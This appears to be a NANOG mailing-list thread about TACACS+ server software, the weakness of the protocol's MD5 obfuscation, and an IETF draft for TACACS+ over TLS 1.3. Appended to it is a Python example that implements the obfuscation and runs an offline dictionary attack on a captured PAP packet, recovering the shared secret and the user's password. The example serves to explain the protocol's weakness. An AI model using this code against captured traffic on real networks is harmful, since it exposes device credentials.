On Wed, Sep 20, 2023 at 10:22 AM, Jim <mysi...@gmail.com> wrote:

> On Wed, Sep 20, 2023 at 11:16 AM Mike Lewinski via NANOG <nanog@nanog.org>
> wrote:
>
>> > https://www.shrubbery.net/tac_plus/
>> That tac_plus has python 2 dependencies and so has been removed from
>> Debian packages. That's not surprising given the last update was 2015 and
>> Python 2 was EOL in 2020: https://www.python.org/doc/sunset-python-2/
>
>> Currently I favor this one, which is still being actively developed:
>> https://www.pro-bono-publico.de/projects/tac_plus.html
>>
>
> Yes. Well, on the plus side, the TACACS protocol has not really changed
> in 30 years. Even the 2015 code could work, provided you can compile its
> dependencies from sources, right...
>
> On the downside, for the command authorization use:
> TACACS+ provides little protection for messages between client and server;
>
> The protocol's MD5 crypto is so weak that routers using TACACS+ for
> authentication might as well just be piping over user credentials in the
> clear: it's barely any better.
>


Yes, but there is current work in the IETF OpsAWG WG to help address this:
https://datatracker.ietf.org/doc/draft-ietf-opsawg-tacacs-tls13/

This work was actually started many years ago, but got sidetracked — there
was no published standard for TACACS, and so we first published RFC8907 -
"The Terminal Access Controller Access-Control System Plus (TACACS+)
Protocol" <https://datatracker.ietf.org/doc/rfc8907/>, and this new
document largely says "Now just do that over TLS! kthxbye…"

Hopefully this draft will progress soon…
W


> Router operating systems still typically use only passwords with SSH, then
> those devices send the passwords over that insecure channel. I have yet to
> see much in terms of routers capable of TACACS+ authorizing users based on
> users' OpenSSH certificate, public key id, or ed25519-sk security key id, etc.
>
> In short... unless you have a VPN or a dedicated secure link from every
> single device to its TACACS server, or an experimental implementation of
> TACACS+ over TLS, I would suggest considering using tools or scripts to
> distribute users and authorizing configurations to devices as local
> authorization through secure protocols, as preferable to those network
> authentication systems that transmit sensitive decisions and user data
> across the network using insecure protocols.
>
> --
> -Jim
>
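
The MD5 "crypto" the thread is talking about, as an added example that is not part of this thread and not code from tac_plus or the IETF drafts: it implements the RFC 8907 section 4.5 body obfuscation (an MD5-derived keystream XORed over the body) and then shows what an on-path observer can do with one captured PAP START packet. Because the first eight bytes of a START body are enumerated values and length fields, a wrong shared secret decrypts to noise and the right one parses, so the secret can be guessed offline against a wordlist and the password read out. The session id, shared key, wordlist, username and password are all constructed for the example.

```python
"""Added example: RFC 8907 TACACS+ body obfuscation and an offline key-guess
against a captured PAP START packet. Not code from tac_plus or the IETF drafts;
all session ids, keys, users and passwords below are constructed."""
import hashlib
import struct
from typing import Iterable, Optional, Tuple

# Constants from RFC 8907 (sections 4.1, 5.1, 5.4.1.3).
VER_PAP = 0xC1                    # major 0xC, minor 1 (used for PAP/CHAP/MSCHAP)
TYPE_AUTHEN = 0x01
FLAG_UNENCRYPTED = 0x01
ACTION_LOGIN = 0x01
AUTHEN_TYPE_PAP = 0x02
SVC_LOGIN = 0x01
HDR = struct.Struct("!BBBBII")    # version, type, seq_no, flags, session_id, length


def pseudo_pad(session_id: int, key: bytes, version: int, seq_no: int, n: int) -> bytes:
    """Section 4.5 keystream: MD5_1 = MD5(session_id, key, version, seq_no),
    MD5_i = MD5(session_id, key, version, seq_no, MD5_{i-1}); concatenate, truncate."""
    prefix = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < n:
        prev = hashlib.md5(prefix + prev).digest()
        pad += prev
    return pad[:n]


def obfuscate(body: bytes, session_id: int, key: bytes, version: int, seq_no: int) -> bytes:
    """Body XOR pseudo-pad. It is an involution: applying it twice gives the plaintext."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def authen_start_pap(user: bytes, port: bytes, rem_addr: bytes, password: bytes,
                     priv_lvl: int = 1) -> bytes:
    """Section 5.1 START body. For PAP the cleartext password is the 'data' field."""
    fixed = bytes([ACTION_LOGIN, priv_lvl, AUTHEN_TYPE_PAP, SVC_LOGIN,
                   len(user), len(port), len(rem_addr), len(password)])
    return fixed + user + port + rem_addr + password


def build_packet(body: bytes, session_id: int, key: bytes, seq_no: int = 1,
                 version: int = VER_PAP) -> bytes:
    """Section 4.1 header (flags=0 means obfuscated) followed by the obfuscated body."""
    header = HDR.pack(version, TYPE_AUTHEN, seq_no, 0, session_id, len(body))
    return header + obfuscate(body, session_id, key, version, seq_no)


# ---- observer side: everything needed is in the captured packet plus a guess ----

def plausible_start(body: bytes) -> bool:
    """A wrong key yields random bytes; the right key yields enumerated values in
    the first four bytes and length fields that account for the whole body."""
    if len(body) < 8:
        return False
    action, priv, atype, svc, ul, pl, rl, dl = body[:8]
    return (action == ACTION_LOGIN and priv <= 15 and 1 <= atype <= 6
            and svc <= 9 and 8 + ul + pl + rl + dl == len(body))


def recover_key(packet: bytes, wordlist: Iterable[bytes]) -> Optional[Tuple[bytes, bytes]]:
    """Offline dictionary attack: derive the pad for each candidate key and keep the
    one whose de-obfuscated START body parses. Two MD5 calls per guess, so it is cheap."""
    version, _ptype, seq_no, flags, session_id, length = HDR.unpack(packet[:12])
    body = packet[12:12 + length]
    if flags & FLAG_UNENCRYPTED:
        return b"", body          # nothing to recover, body is already clear
    for cand in wordlist:
        plain = obfuscate(body, session_id, cand, version, seq_no)
        if plausible_start(plain):
            return cand, plain
    return None


def pap_password(start_body: bytes) -> bytes:
    """Skip the variable-length user/port/rem_addr fields to reach the password."""
    ul, pl, rl, dl = start_body[4:8]
    off = 8 + ul + pl + rl
    return start_body[off:off + dl]


if __name__ == "__main__":
    sid, key = 0x1234ABCD, b"cisco"   # constructed session id and shared secret
    start = authen_start_pap(b"admin", b"tty0", b"192.0.2.10", b"Sup3rSecret!")
    captured = build_packet(start, sid, key)
    hit = recover_key(captured, [b"password", b"tacacs", b"cisco", b"secret"])
    if hit:
        print("shared secret:", hit[0], "password:", pap_password(hit[1]))
```

Two things worth noticing: the pad depends only on header fields sent in the clear plus the shared secret, so the secret's entropy is the entire security margin, and there is no integrity check at all, so an on-path party who knows the secret can also flip bits in an authorization reply. ASCII login is no better than PAP here; the password just travels in a later CONTINUE packet under the same construction. That is the gap the TACACS+ over TLS 1.3 draft closes.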
